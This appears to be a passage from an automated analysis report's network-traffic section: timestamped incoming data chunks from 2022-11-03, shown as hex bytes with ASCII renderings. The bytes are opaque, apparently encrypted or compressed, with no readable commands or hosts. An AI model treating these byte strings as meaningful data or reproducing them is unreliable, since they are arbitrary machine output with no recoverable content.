2022-11-03 06:22:07 UTC	110	IN	Data Raw: 92 99 58 82 c8 0c d9 ee 53 be 9d 61 39 48 ea 40 12 8d 25 34 43 3e a8 af 90 7e 66 bb 3a 99 1f 24 96 c4 e8 4c e6 98 f1 c6 91 49 ca fc a5 41 ce bb c6 2b 68 c4 76 fb 25 6a 53 5d de 1a c1 d0 e8 49 0c c6 45 54 ff 78 24 cc ab a3 fd 00 3f 17 ef be 48 4f c3 db d0 a8 93 57 f7 6e 05 f0 82 b4 4f 82 8d 45 d4 2b 13 bc 6d 0a d3 38 d6 bb c1 6c b9 5c 92 16 bd 80 8f 7d c8 de 33 d5 79 74 5f 96 c5 12 d7 85 45 d1 f8 55 8b ff af 13 7a ac 0c c0 e6 dc d4 f4 0a 04 83 ba 51 dd 9f 57 f6 58 c4 27 1b 80 ce 19 7a ab ff 9e cc 2f 9f 59 1f 9d b5 ee 4c bb cc 09 08 77 ca cf ba c0 39 d7 bf 6f 07 7f 4e 00 bd 91 b8 2d b9 36 6b d7 66 5c ef 0c d6 82 3b 36 6d b4 d0 19 20 05 58 3e 04 7f c3 09 ef 85 c2 9d 6f 6e e9 c7 71 4b 88 a7 b5 0c a6 61 dc 2e 52 01 ac fe 8c 0c 67 d6 b3 51 11 72 ca 5e 6b 8b e5 Data Ascii: XSa9H@%4C>~f:$LIA+hv%jS]IETx$?HOWnOE+m8l\}3yt_EUzQWX'z/YLw9oN-6kf\;6m X>onqKa.RgQr^k
2022-11-03 06:22:07 UTC	111	IN	Data Raw: 63 df ac 28 0b 7b 7c da 44 0d e7 2f b3 15 7e 14 10 4b d8 2e be 8b 3a 46 34 36 76 62 cf 9e 9e 3f 91 89 4d 93 0b 18 b8 fb 0d c1 2d 43 18 82 ae 8f 88 6f d4 76 1c 95 bd 78 06 a5 dd 6c 67 06 29 f4 04 a6 db 95 18 6c 6b 6a ec d7 f1 f9 bb 33 67 2f 2d fb d6 b0 94 a2 5e 96 7e 69 63 31 99 23 37 88 a8 65 31 8a b0 84 b6 04 61 6c 63 48 91 e9 ff c7 ac 8f 65 c9 a4 0b 31 8f fc 78 29 91 d3 97 79 04 1a 5d f7 ff 49 01 52 36 80 e6 e1 ea fa d9 e6 fb 36 c2 cb 00 4a ae a2 c1 74 e2 27 eb 59 2c 38 3e 5e 75 ac 91 28 45 bd 7e b7 6e 55 c7 3f 7d 2e ef b5 81 29 72 a4 80 77 ef f9 9c 21 b0 b9 ed fc 66 78 80 4b 91 c2 93 37 91 17 6e a5 ba b7 ce 10 5f 2b 03 8c 25 76 6f 5a 4f 8f c3 45 3b 1d 36 f5 e7 22 53 d3 18 51 8e 0d a7 5e 8d b3 26 29 71 a0 89 a2 a3 8b 48 56 a1 28 cd 28 ce cc d5 a4 f5 98 Data Ascii: c({\|D/~K.:F46vb?M-Covxlg)lkj3g/-^~ic1#7e1alcHe1x)y]IR66Jt'Y,8>^u(E~nU?}.)rw!fxK7n_+%voZOE;6"SQ^&)qHV((
2022-11-03 06:22:07 UTC	112	IN	Data Raw: 3e 8b 71 11 a1 77 4b 53 46 2d cc ec a9 58 a8 65 e6 a6 eb 47 f0 29 d7 90 b3 86 8d 6e bc cb 5d 8d c9 75 ff b1 51 07 09 f4 7b 24 fa 7f 6c 37 42 d6 ab 92 54 4e b0 11 88 34 2e a0 de c9 2d d5 aa fc bd f4 15 c8 e5 b1 42 9f e3 a2 4d 2d d6 64 e5 1c 53 53 79 af 22 e7 cc f4 43 2d 91 53 0c e5 27 14 ad 8b 81 af 51 49 51 d2 a8 54 7c f3 eb fb ba 92 41 ce 27 07 f5 97 bb 22 87 9d 73 e7 0c 57 9f 22 52 bd 6f af a3 f7 4b ec 1a a9 5d 9c b0 81 48 e3 b7 2b c8 7b 49 62 90 db 2c d7 c4 1f 89 8c 29 e0 eb b2 01 2b f3 55 95 c4 d2 e1 ed 22 0f 9a af 1a a8 b8 1c fc 59 e5 6d 4e b3 c3 00 66 80 a6 b8 c7 2f aa 48 27 f5 8c ee 60 a1 8d 2c 31 26 88 95 f3 d4 3b 9b b0 70 3a 78 5f 33 8b c9 be 79 ba 01 4b ce 5b 0b cf 12 db a3 6b 75 7e b2 91 68 2b 38 7a 0f 62 70 f1 1c e5 a8 c9 8a 62 44 c9 9f 26 01 Data Ascii: >qwKSF-XeG)n]uQ{$l7BTN4.-BM-dSSy"C-S'QIQT\|A'"sW"RoK]H+{Ib,)+U"YmNf/H'`,1&;p:x_3yK[ku~h+8zbpbD&
2022-11-03 06:22:07 UTC	113	IN	Data Raw: 8a 19 0a e6 6e 47 3c 01 c5 d0 5a 2e 10 8d 2f 86 11 de fb 5a f3 46 32 73 53 22 8f ad 05 27 46 40 ea 3a 22 cc 3d a2 0e 70 4f 48 38 8f 41 aa bc 61 5d 7e 19 27 66 82 9b aa 06 8e cf 33 8a 20 4e fb de 34 f1 22 4f 05 f3 bd 9e af 5b a7 77 20 bc 9c 49 30 be cc 5a 45 13 38 c5 39 c1 9d dc 36 79 72 5f d3 fd b9 da 97 17 7e 0e 56 84 e0 Data Ascii: nG<Z./ZF2sS"'F@:"=pOH8Aa]~'f3 N4"O[w I0ZE896yr_~V
2022-11-03 06:22:07 UTC	113	IN	Data Raw: bc 9a a6 4f b4 72 58 7b 67 c1 71 71 c4 ac 44 37 9a 8e e3 f0 54 77 0a 10 45 c8 bb a0 d2 a8 bd 4d ba a8 34 05 d3 b5 1d 2b 9a c4 a1 65 00 0f 5b e9 8c 0e 32 47 0e 90 f2 e5 9e f8 ef fd d1 0d d2 eb 6e 69 a2 ce ef 75 f7 06 e0 7f 25 25 31 4c 1c 85 93 08 7e a1 74 d4 62 78 d2 13 42 47 dc b3 80 5d 70 83 98 47 c4 f7 b1 27 ac ac ed c9 66 6d bb 51 fd ca 95 28 8a 2f 1a 97 df 8b ed 06 45 08 12 90 44 4d 66 48 2b 85 c3 59 23 3c 36 ef 86 70 72 d7 08 73 8f 00 a6 5e 9b b7 33 2c 22 87 9e bf 99 84 3a 67 af 0f e0 31 d9 ee d2 a2 fd 8e 2b 99 7d d6 ac 77 14 9b 86 77 5b ea ff fb e9 13 0e 4a 31 96 85 8a 5c 2a 02 6a 1a d9 d8 93 67 ff c5 02 f5 55 2c da 10 f0 90 d9 16 00 ea d2 5a 5f 82 b3 0b 7f f0 8c e5 e2 af f4 70 01 1b c1 8d e2 79 f3 f5 45 27 c8 9d 26 91 1c 9a d8 49 a5 ef 6e e5 10 1e Data Ascii: OrX{gqqD7TwEM4+e[2Gniu%%1L~tbxBG]pG'fmQ(/EDMfH+Y#<6prs^3,":g1+}ww[J1\*jgU,Z_pyE'&In
2022-11-03 06:22:07 UTC	115	IN	Data Raw: a1 4d 89 af ab 01 43 e7 38 6b 8f 4c 6d fc ef fc dd 38 35 37 d4 dd 7d 0a aa b0 8b dd f2 b7 62 55 51 88 e6 f3 23 f5 ea 4b bc 6f 23 ec 58 33 f3 1a ea d6 8c 0e 8c 7c 47 0a f9 a2 9f 31 94 ee 76 b7 25 2a 05 f1 32 da bb ca 64 e9 d8 77 b7 9c ec 77 62 9e 27 9b bf b2 b5 b0 6e 60 ec ca 48 a8 e0 71 84 aa 34 1c 40 fd af 67 17 d3 4a 7d 84 47 5f 0c 5f f3 ce 8e 89 4c ea 7c dc 6b db ac 80 b7 5d 89 73 ae 56 06 3a 47 fc 4b 3c 16 c8 52 36 22 a6 6c b3 50 3a 37 0b 73 2c c5 65 87 43 46 2f 7f 64 25 c4 6c a5 d3 25 43 28 23 b6 7b f0 6c b3 c4 47 bb fd 15 a8 31 36 76 df 83 ce 29 43 39 43 74 53 05 89 75 9d 25 df 5f cd d7 93 2f 67 05 3c 7d e3 c2 d2 15 07 f7 41 df a4 31 66 21 e5 85 9d 54 bc ba 1a 10 87 74 35 05 63 5b 02 f6 da ef 47 cd e5 95 3f b4 fd 39 5d 66 34 bd b2 e3 6b 92 36 48 55 Data Ascii: MC8kLm857}bUQ#Ko#X3\|G1v%*2dwwb'n`Hq4@gJ}G__L\|k]sV:GK<R6"lP:7s,eCF/d%l%C(#{lG16v)C9CtSu%_/g<}A1f!Tt5c[G?9]f4k6HU
2022-11-03 06:22:07 UTC	116	IN	Data Raw: b4 5b 19 f7 f1 b6 19 a4 f9 b4 7b bb af 39 81 8d b8 93 fd 56 18 7f 45 b7 e1 c6 fa d8 30 ff 01 3c 95 95 aa 31 95 2c d1 0d 44 ee 6b eb 91 b0 9a 5d 72 28 b5 59 52 90 40 cb 26 ba ed 4e 6e b4 c9 68 7f 75 af c3 04 60 63 39 bb 88 5b d6 16 48 69 62 9d 9b 8d f3 95 86 64 a3 af 12 9c 2f d3 ad 1c a3 57 9c 9a 65 45 dd d5 7d f9 8d 40 00 f1 13 d5 17 9d 46 44 1e 0e bb d5 69 78 05 66 0c 0a f5 8e de 60 c5 d9 ff 2e e3 16 c4 0c ef 2c d5 4e 55 96 14 d6 3b 66 b3 1a 37 65 46 fb 45 0d 83 c9 41 d5 2d af 43 79 53 93 07 07 05 36 8c 32 f5 18 c8 59 e9 d0 53 5a f1 13 ee d8 d7 e7 28 b2 e5 5e 08 b0 b9 2e b9 c2 e5 eb 22 eb 1a b6 da b3 91 ea 6e 03 39 80 e2 a0 8e 74 63 09 7e e1 e6 fa 2b a9 75 08 5b bf 90 e1 01 48 fc 06 a1 21 cc aa 47 b4 f8 2c 6b 04 be a6 ba 27 cf dc 7f 4e c6 8f a9 86 c6 98 Data Ascii: [{9VE0<1,Dk]r(YR@&Nnhu`c9[Hibd/WeE}@FDixf`.,NU;f7eFEA-CyS62YSZ(^."n9tc~+u[H!G,k'N
2022-11-03 06:22:07 UTC	117	IN	Data Raw: be a0 2c a1 dc 18 7b a3 75 bc 83 ff 24 f2 95 c6 1b 54 bf 06 97 6a 2f 2e 97 36 41 8d b4 92 05 59 ff 23 70 07 ee 6f f1 f2 e7 d1 bd a2 36 dc d3 24 1a 2c 11 8e ce f1 b5 1e 55 59 88 f6 c1 a2 6d fa 09 a4 5a 33 6d f5 35 dd 07 fe db 05 8b 8d 60 da 3a f4 30 43 2f 99 f4 68 8e 3f ac b9 e2 a7 52 39 61 7a e2 e4 7d 96 8e d5 63 c2 01 39 86 a3 a4 94 b9 4f 6e e5 d1 e8 0d ff 77 95 39 90 19 5b f0 26 fc 00 cf d6 d3 90 47 5e 88 56 fb c7 98 29 d5 fb 6c 59 4d c8 e4 8f b7 48 9a f2 0d d5 d9 3a 41 ee db 90 1a ee 46 25 b0 bc 6b bb 62 bb d6 11 f7 20 d1 f0 3c c2 fd 1e 72 68 22 86 e8 3a c3 b4 6e 0d 34 e4 ff 76 69 a4 56 63 5e fe 13 a8 f8 f9 75 f5 84 da bf 5c a9 ed 77 48 10 0f c2 1e f2 c4 4a dd 56 13 3c e8 38 39 7d e0 ce d8 09 1b df 43 db aa 2d 72 bd d8 82 0e 0d 1c bb 09 8c a3 75 25 05 Data Ascii: ,{u$Tj/.6AY#po6$,UYmZ3m5`:0C/h?R9az}c9Onw9[&G^V)lYMH:AF%kb <rh":n4viVc^u\wHJV<89}C-ru%
2022-11-03 06:22:07 UTC	118	IN	Data Raw: c1 74 f1 45 ab 2c b2 3a bf 55 af 78 b9 d9 ff db db 40 19 41 c3 fa 0d 58 d3 b0 47 17 7e 4e ad 2b 27 e1 a0 61 3d 18 2f 21 47 a8 0c 11 55 10 78 74 34 09 ca 7f 1b 01 7d d5 2d 34 0c a9 20 13 b4 d0 3e 45 f9 fb 60 9e 3f 0d 44 d1 1c b6 5b f6 90 42 fe 39 39 aa 43 67 b3 d0 f9 76 f2 a0 d1 12 61 fa 15 93 8b 4d 59 3d 50 f8 03 a1 97 98 8f 87 84 4a ab bf 81 3d c8 c9 ab 1a 8d 42 0f 3a 49 50 59 28 70 e1 fa 4d 86 f0 19 d3 01 17 a8 5d 94 0f b0 c0 ef 5f 06 66 38 05 90 97 df 42 c6 c5 f1 ab 04 1b ea 14 e1 ab f7 5e c8 73 07 d8 a0 f8 ad 69 39 ee bf ed 56 9f aa 28 4a d5 2d db 52 5c 5f 89 8e 29 1f bc 7e b0 63 64 f4 5e db 53 8b 4e 64 e1 6c 7f f6 e6 3f 13 c0 5e 09 bd a1 8f a1 d1 89 e5 ab 6a 19 a4 c8 36 51 f9 f2 1f 34 80 df ab 8d 7a 79 0e 50 e4 e3 f4 b9 db 42 8f 96 af 13 f4 01 4b 1c Data Ascii: tE,:Ux@AXG~N+'a=/!GUxt4}-4 >E`?D[B99CgvaMY=PJ=B:IPY(pM]_f8B^si9V(J-R\_)~cd^SNdl?^j6Q4zyPBK
2022-11-03 06:22:07 UTC	120	IN	Data Raw: b1 26 dc 27 70 7b 8f 95 d3 e8 99 10 4b 00 87 5f 79 34 ab 26 77 4d 5f 4b c6 b5 b5 ac ad dc 19 e6 ad 5b a3 85 ce a7 56 97 47 cd 44 34 ac 90 48 38 3d 15 a7 45 a3 a9 aa 10 df 4b 30 41 86 4a 7f 7e 7b f4 e0 3c 3d 26 53 7a 34 0f ad aa 0f 37 eb 32 b8 45 d6 8d f1 53 de e6 79 03 ae 48 2a ef 42 b6 ca 0a 6a 73 97 af 8f 7c 46 db f7 30 0e 31 85 69 60 9e 0d 2c 01 62 0f 46 99 c4 69 6d 41 75 bc 8f c5 7b 52 9d 39 94 b3 aa 8b b2 67 65 f7 c5 60 a0 f5 76 15 ce 83 9f 4a e8 a1 62 10 40 d3 c8 97 d7 da 28 53 f6 d3 94 15 d0 e8 6c 40 4f c2 e6 80 b5 4a 99 e1 9f ab 1a be b1 f7 ce fe 09 dc c7 8d a3 2d ef 24 5f a8 56 9a 64 b8 df fd 3c c3 cd 0e fd 6e 2f 93 68 a1 dd bd fd ae c8 a9 fd 75 79 34 de d6 da f6 02 3b 71 29 79 d3 84 ca 35 4c bc e2 70 5a 00 9d e6 85 fa f8 5e cd c4 0d 17 e0 04 3e Data Ascii: &'p{K_y4&wM_K[VGD4H8=EK0AJ~{<=&Sz472ESyH*Bjs\|F01i`,bFimAu{R9ge`vJb@(Sl@OJ-$_Vd<n/huy4;q)y5LpZ^>
2022-11-03 06:22:07 UTC	121	IN	Data Raw: a9 81 2f 23 e8 f1 44 1e b0 e5 f3 c3 2d 90 44 57 a8 13 d0 3d fe 2f c2 cb a5 d9 0f 8d 38 ed 38 ce 32 c0 bd 38 43 80 86 ee 10 8b 35 eb de 6e f5 e9 c1 de 8a d2 1f 02 ba 38 1b a7 ab 14 d5 9b 17 7b bd 61 a3 50 fc 6f d5 e3 d0 98 1a 0e f4 50 8d a7 e9 74 7c aa f2 82 32 3d 89 fc 55 64 64 4b 8d 97 2f ee a6 8a 43 f5 27 98 2b e8 6d c4 ef 7f 72 13 c1 75 e2 28 4e bb 63 f8 ce 1c e2 1c d6 83 cd ac e7 50 3f f3 37 81 93 c6 c2 e6 0d a2 f9 0b 8f 73 70 1d 71 dc 40 1e 89 34 fd 39 8e 82 0b 07 5b aa 63 7b 3d d1 a0 a3 bc 5d ee 2d a9 46 c6 d5 b7 5d 21 de 44 65 b8 17 87 6d ef 5e ab 33 65 74 82 73 26 b6 b8 0c 32 e7 d0 e4 e4 5c 8e 45 73 f7 4c 0e 06 18 85 47 a1 ee 5c 7e e9 56 86 7d 1a 23 a0 8b 9d 49 66 50 3a a1 8b b3 84 87 1d 03 a8 e9 8c 9e 44 bb 59 ef 2d 62 6d c0 c3 ff 03 12 97 a3 ee Data Ascii: /#D-DW=/8828C5n8{aPoPt\|2=UddK/C'+mru(NcP?7spq@49[c{=]-F]!Dem^3ets&2\EsLG\~V}#IfP:DY-bm
2022-11-03 06:22:07 UTC	122	IN	Data Raw: a0 2b 7e 2a 79 43 af 2a c4 b6 a6 96 2b 82 32 8d ae 67 7e a4 d8 95 81 08 42 5b 33 4a ca f2 16 00 89 91 df f3 d1 ef 6a 52 d6 03 b0 c3 ef ea 32 98 de ee 0a f3 4f 44 8e 78 23 30 7d d1 84 65 34 a8 d4 9f bb f7 28 10 c0 6c 3f 75 7a af 8e 6c 22 41 21 b7 c2 2c 93 15 f5 39 4a 84 24 88 0c 25 dd 2f f1 9f 68 64 cf b5 12 cb a2 49 1d ca 74 b0 95 ab 7b cc cf 87 4d 9d 57 11 9d 07 6c 6d a2 fe 29 23 f8 d3 9c 34 fa de b5 28 03 4d 19 26 77 fe 8a 0c 7c 7b 93 2b 5c 32 0a 33 36 c9 56 b8 8a a5 8e a2 90 c6 89 fc 65 8f ba 51 59 3f 35 8f 3d 6c cb da 6f 5c 8f ea 42 1b 18 70 87 6f b8 41 11 1d fb f9 8d 58 93 af 7b 2c 7d 80 cb 30 e9 d4 aa f1 e7 23 ed 87 c1 04 c6 ae 2c 40 a6 b5 4c b4 4e e9 cd c9 99 1b 4c 9c cc ac fc 8c e0 dd a8 cc 1e 57 ac bd 69 4d 2a 81 01 4f d3 1a eb dc ec 48 aa 30 35 Data Ascii: +~yC+2g~B[3JjR2ODx#0}e4(l?uzl"A!,9J$%/hdIt{MWlm)#4(M&w\|{+\236VeQY?5=lo\BpoAX{,}0#,@LNLWiM*OH05
2022-11-03 06:22:07 UTC	123	IN	Data Raw: 6e 1c de 6f e1 54 8c 9f ac 3b ed f5 77 ad 1c 8c c9 6d 6d a2 cf 36 96 82 23 27 fd 2e d7 92 82 64 d2 92 f5 80 33 8b aa 47 e2 f7 ac 0a 9f ce fc aa e8 ae 7d 27 ed f0 a7 34 77 88 93 03 ff 03 f0 74 29 7a 1f 51 7b 70 98 ae 95 b4 d6 98 83 48 ff 1f ea 72 2d 95 ae 37 7e 50 c7 a0 29 86 e5 4c de 22 23 62 e5 d4 68 25 b3 c4 e3 8f ab a1 d3 76 0a 52 07 15 21 09 ac 31 d9 82 f9 ad 0f 92 29 c7 0e dc ed 31 19 4a 17 ca 6c 4b 51 99 45 0d 41 8c d5 1d 0d 18 56 8e e8 24 05 b2 37 8a dd 81 64 ac 46 23 bc 2b 50 c3 7e 3e 16 cd ec 1a 40 13 92 63 30 60 23 1b d3 27 86 a8 2f 34 4f 44 b4 92 34 04 97 11 6e c8 8d e3 6b 0e 8d 0b c1 cf fb 78 f4 73 b5 29 2f fd 04 e8 66 ee fe 75 36 a8 a2 03 54 c7 f6 28 f3 cb 6e 7f c7 78 7a 86 1a 10 7b 9e 98 85 69 88 aa 21 6b 4d 9b d0 12 51 09 05 f5 19 ab 30 e9 Data Ascii: noT;wmm6#'.d3G}'4wt)zQ{pHr-7~P)L"#bh%vR!1)1JlKQEAV$7dF#+P~>@c0`#'/4OD4nkxs)/fu6T(nxz{i!kMQ0
2022-11-03 06:22:07 UTC	124	IN	Data Raw: 54 88 bb 29 b5 5a 63 35 26 32 2e ab 85 b9 80 f0 7c aa c1 7c b6 ef 69 c8 b8 4a 1c 93 5a a9 87 66 bf 16 4e 71 3c b8 80 05 a4 a0 93 a4 b7 68 94 5f 3e 9b 18 9e 9b d3 d9 4e cf bb 0f c2 70 88 0e 2c 5b ec d6 45 35 e9 3d e2 2b 2c 7d 54 e4 00 76 11 a4 4d 02 14 e3 52 06 e4 9e d2 90 a8 63 f6 39 91 c5 e6 bc 8d 0a 1f 31 39 b8 4c c4 c0 04 ab f8 74 90 a1 f8 c6 0b a2 3a b6 de 5e bd f4 c5 f9 72 a1 c4 4d 4b 1d fa 18 a7 c2 0e 09 d2 46 55 11 fc 0d 06 d0 b1 91 d3 d7 99 13 bd be 77 f8 91 36 42 0c 43 23 a0 0b 50 95 16 3d d1 ab 6b 84 b7 0d 30 c7 00 c6 a3 32 b3 49 d2 6f cb 2d 3a d0 65 17 33 04 de 3e 7e 36 e7 88 11 26 fb 93 e6 e7 5f d9 0c e8 79 6a 36 38 20 be a1 1e 37 d4 41 c6 d9 96 56 0b c2 a0 b6 f0 69 ca 67 56 3a 36 55 ca 1e f2 1d f5 2b d8 56 06 bb d3 ad 1d b9 02 80 3e 3c f7 7f Data Ascii: T)Zc5&2.\|\|iJZfNq<h_>Np,[E5=+,}TvMRc919Lt:^rMKFUw6BC#P=k02Io-:e3>~6&_yj68 7AVigV:6U+V><
2022-11-03 06:22:07 UTC	126	IN	Data Raw: f1 ab 1d 40 08 42 64 7a 61 d7 38 f7 0f 4b ce 4e 3f 6e 84 9b 04 7e f0 58 2c 7e c6 c7 ae 34 93 ee fd 91 92 64 67 76 37 d8 cb 22 07 61 93 8c c3 bd 92 83 24 e9 bf 5b 57 4b 0a 5d f4 ed 73 00 da dc d5 4d a2 70 3f 48 2a 89 0a b3 f3 b1 58 b7 5b 6c f8 25 05 72 1a 22 13 79 4e 97 c8 5f c1 c4 ca ba 5d 4d 11 6b a5 6c 10 f0 ed 89 46 4b 46 dc 01 10 26 30 ca 1c 11 de 75 29 71 22 3d 6e e6 01 f3 12 7d 0f 00 9c 18 57 26 d9 e6 59 63 d9 3f 3a 78 8f bd 09 70 d9 da bf af 20 2f 1d 54 06 d8 31 84 0e 5e 84 2b 24 af 63 3e c1 88 02 64 0d c3 48 48 46 d8 47 6b fb 91 26 f1 18 1c 44 90 63 21 ba f3 2d 15 d6 3f fb c2 20 ff 01 21 9e 2d 4e 89 54 ba 6a fe ba a0 ea db 3e 19 7a 97 c1 27 37 8a dd 57 82 a2 96 31 e0 ce 9d bb 6e 1f fb cc 4e a3 d0 d9 04 03 60 59 e2 3f 6e e6 3c 2c 6d 13 34 2a d5 91 Data Ascii: @Bdza8KN?n~X,~4dgv7"a$[WK]sMp?HX[l%r"yN_]MklFKF&0u)q"=n}W&Yc?:xp /T1^+$c>dHHFGk&Dc!-? !-NTj>z'7W1nN`Y?n<,m4
2022-11-03 06:22:07 UTC	127	IN	Data Raw: 8e b2 69 dd 55 9c f7 c0 ea c6 e7 6c c4 f4 c0 c7 e3 e1 40 92 40 1c 02 48 3f bf 44 15 20 cc 28 b2 ed fd a9 33 2a e0 99 d8 d9 1e 4f 65 4c d4 34 9f 65 50 77 f5 07 c2 7d a1 3a 65 15 31 72 15 2c 9a ca 9c e2 72 c2 93 ba 45 11 80 e9 54 86 41 7b 80 73 f6 82 ce dc ba 00 e1 66 cd a3 e3 14 2b 0e 2e bc 9a 96 21 e8 02 24 de ea 74 be 44 5d fe a3 63 10 3c e4 76 cd 28 03 85 c5 0b f9 83 ee 89 85 c2 ed 58 a5 69 ba fa ae 75 6b 78 49 e3 89 a2 7a 81 b7 db 7d dd fa be 70 b0 10 91 e6 00 8b 26 b9 43 43 d7 b5 f8 c1 83 34 ac ad 69 a9 fb b8 d0 f0 93 bd e3 1e 12 a2 1c b9 cd 80 f1 63 9f 62 fe d3 eb 65 ff e2 6c 8a f1 82 18 47 c3 3e fb b3 ed 18 7e 94 6e 72 74 03 3f 5b fd 93 0c 50 5c 39 f4 57 5f 38 5e 15 d3 75 6a 3d 1b 49 8c 1c bb 5d 5f b0 33 90 36 26 32 06 2d f2 31 52 f6 b5 fc 6f 61 26 Data Ascii: iUl@@H?D (3*OeL4ePw}:e1r,rETA{sf+.!$tD]c<v(XiukxIz}p&CC4icbelG>~nrt?[P\9W_8^uj=I]_36&2-1Roa&
2022-11-03 06:22:07 UTC	128	IN	Data Raw: b2 b1 c7 97 86 b3 0e 57 83 95 27 72 8a 45 86 b8 3b 9b 4e 72 83 58 83 56 63 fd af 67 e5 06 da fc 08 8d d5 a4 a1 ed a7 a2 9f 7c f7 bc 0a 07 be 83 f6 35 a5 1e fa 42 52 54 b8 2b b6 ef fd 73 a5 2b d6 db 04 ee 83 3a 63 e3 b2 9d 87 8e 92 66 4a f4 79 18 60 55 84 a8 48 2b 24 2c 93 44 c2 7f f4 21 03 da de f0 4e 42 ea 72 80 17 3a 56 9a 99 f5 a2 8e 74 e7 50 00 30 1f 72 90 1c aa dd 97 fc f8 92 49 73 d5 9d 1d fc 5e 06 7c e0 c7 04 3e 12 84 d9 37 d0 0e d4 bb 6c d5 8d b1 13 75 18 fe 1b 64 95 01 6f 0e e4 ba 19 18 d2 10 fc 7b 28 35 95 4d 88 3d 5e a0 f2 ef 2e dc 00 a7 0d 1e 79 c1 dd c4 8d 78 48 16 24 5d 8e 9d dd b0 4e 2a 3f e1 27 b7 41 49 f7 ca 4e 1e 1d 7a 2d e8 b6 ae 3d 6f 1b a8 52 1f fc 90 51 b6 04 45 e1 9e bd bb bc ee 51 df 23 46 64 1f da cb 32 8f 64 cd af f6 c2 ac 4d f0 Data Ascii: W'rE;NrXVcg\|5BRT+s+:cfJy`UH+$,D!NBr:VtP0rIs^\|>7ludo{(5M=^.yxH$]N*?'AINz-=oRQEQ#Fd2dM
2022-11-03 06:22:07 UTC	129	IN	Data Raw: 0c 1c bc d5 f3 ea 81 36 03 d3 4a 87 bb e3 4a d8 c9 20 3b 8c 76 41 4c 26 68 17 e4 ce 3e cf fe f7 d7 72 c5 f7 53 f0 d1 2b 77 57 55 4b 5a b3 99 2a 05 1a 4c e5 02 0b 50 f9 52 9b 89 c8 60 3c f9 a8 76 68 82 b9 87 cb 00 88 3d a0 48 10 f8 20 94 ac c4 f9 c2 0e 40 20 00 76 8a c4 5e f1 80 81 8b 1b 52 0b 1f 96 24 65 03 9f e8 18 63 a4 Data Ascii: 6JJ ;vAL&h>rS+wWUKZ*LPR`<vh=H @ v^R$ec
2022-11-03 06:22:07 UTC	129	IN	Data Raw: d5 0d 95 e8 91 20 c4 8d b2 bf 89 58 44 01 17 9c f1 cc 42 a3 7d 74 99 b1 c2 94 0c 1b 9b ba 5a eb df ad c7 09 0b cb 83 61 48 35 7f 46 cf 15 e9 55 90 67 e9 38 2e 06 14 ad 9a 5d b2 5e be 1e 83 0c 09 fa 82 0f 89 47 b9 f5 d5 fd d4 a2 f7 e2 a7 58 4b 9a 53 7f f4 86 8d 12 a3 b7 3d e2 c1 d1 7d a6 22 f1 49 d3 c6 d9 e2 31 9a 9b e3 7c 64 66 21 e0 3e fa 20 e3 dd 34 93 b4 40 92 45 0b 41 e3 ba 2b 50 ee 90 b8 b7 58 eb 00 2b c2 3f cd 22 ba 7e e4 6f a4 c3 29 b9 fc de 6c 0f 1e 26 9a ae 1d 7c 1f 62 75 86 62 8e ef c2 fe 2d 30 c6 a9 b6 7e 7a 72 29 95 99 a6 05 c9 73 85 42 b9 54 56 07 9a 71 96 8c 9d 71 7e 0c c1 c9 c1 da 86 ac 28 e9 bb da 06 fb 5b 2f eb 94 2a 5e fd e9 d1 4f 4d ca 1b a5 05 3b b8 b2 e3 cc 70 4f c8 3b 86 9d d6 ee 48 9a 3a 84 52 c4 f3 cd 91 32 d7 5d 84 23 ab ac 46 95 Data Ascii: XDB}tZaH5FUg8.]^GXKS=}"I1\|df!> 4@EA+PX+?"~o)l&\|bub-0~zr)sBTVqq~([/*^OM;pO;H:R2]#F
2022-11-03 06:22:07 UTC	131	IN	Data Raw: 9d 15 1a 44 28 18 06 54 44 4e 9a 8e cb 77 fc 91 cf 83 e4 31 88 b3 aa 29 1a 7a 8a ab 8d e5 08 ef cf 54 0f fd b9 ab 8a da f3 a8 2b a5 5f 62 ac 88 5f ad f8 70 92 42 6c c2 77 79 8d 0c 6d 65 3a aa 0e 54 4f 73 90 42 bd 02 2c 69 7d 78 ec 76 9b d4 f1 0f 72 51 a5 bb a9 85 55 4a 11 a1 e8 1a b4 e2 5c c0 84 74 45 6a a7 e4 b6 44 9d 74 94 31 ab 98 46 82 5f 6f 69 ce 94 90 81 bd f8 9f 59 cb 38 ff 85 b8 9e 3a 1a 51 2f 55 1d 9b 6e 2b 73 2c 8d 82 39 62 b0 40 43 c2 33 ca 1b e8 93 81 74 9d 30 3b 3a 1c 80 67 76 67 82 6d e6 86 3b 6f 88 c0 9f 7e 23 3e 5e 83 39 09 6d 97 17 47 0c 70 2f 23 73 0b 3f 92 3a 25 68 e3 0b d1 d3 c5 c7 5f 77 ab 0b b2 97 7d 38 f1 b3 4d a1 5c a1 7a 0f 74 f9 8c 7a 1f 41 d7 c2 63 14 c5 38 53 02 6b d3 c0 bc ac 28 2d f2 3a 56 41 2c c8 fe a9 1e 2b 37 c9 3a 47 ef Data Ascii: D(TDNw1)zT+_b_pBlwyme:TOsB,i}xvrQUJ\tEjDt1F_oiY8:Q/Un+s,9b@C3t0;:gvgm;o~#>^9mGp/#s?:%h_w}8M\ztzAc8Sk(-:VA,+7:G
2022-11-03 06:22:07 UTC	132	IN	Data Raw: b1 25 49 84 c3 a2 ce 46 38 b1 ab 1f 98 bd 85 cc 17 1d a7 4b 84 9b 47 c5 38 11 69 61 9c 8a 81 01 12 4b 7e 73 b3 83 57 09 11 d5 65 ad 27 84 cb 29 e6 f5 6d b0 0f 60 43 c9 03 a8 93 8c 02 53 e2 88 7b 33 98 39 eb d4 c2 3c e9 25 19 6a c5 79 de 54 97 98 39 8e 1f 58 c9 39 d1 7d 67 0c ba 4f d3 f1 f9 85 ad 59 56 d9 a5 86 c2 fe ce 67 d4 c9 6e 99 ec 64 8a 03 a0 de 00 24 dd e7 d4 24 0c 5c a3 80 97 7c 18 52 10 f7 08 f1 08 d6 bc 5f 67 28 1d 84 ab a7 93 72 f2 68 e3 3a 8f 24 6d 91 c9 02 49 03 e8 32 34 5f c8 2d c3 1c ce 40 de a7 4a ae 18 47 a7 77 dd 11 90 a3 51 06 10 d5 97 bb 1b f9 b1 45 9f f0 8f a9 3c 9d 2b 3c 65 0b c8 fe f8 60 e6 59 23 03 3c 4b 43 31 93 b1 74 4a 9a 7e 14 5b cc 55 e0 db 94 71 df 23 84 db 9a df 1f 76 c4 32 bc c7 9d 62 b8 6d 57 d1 8f f6 48 91 cc 94 58 8a ee Data Ascii: %IF8KG8iaK~sWe')m`CS{39<%jyT9X9}gOYVgnd$$\\|R_g(rh:$mI24_-@JGwQE<+<e`Y#<KC1tJ~[Uq#v2bmWHX
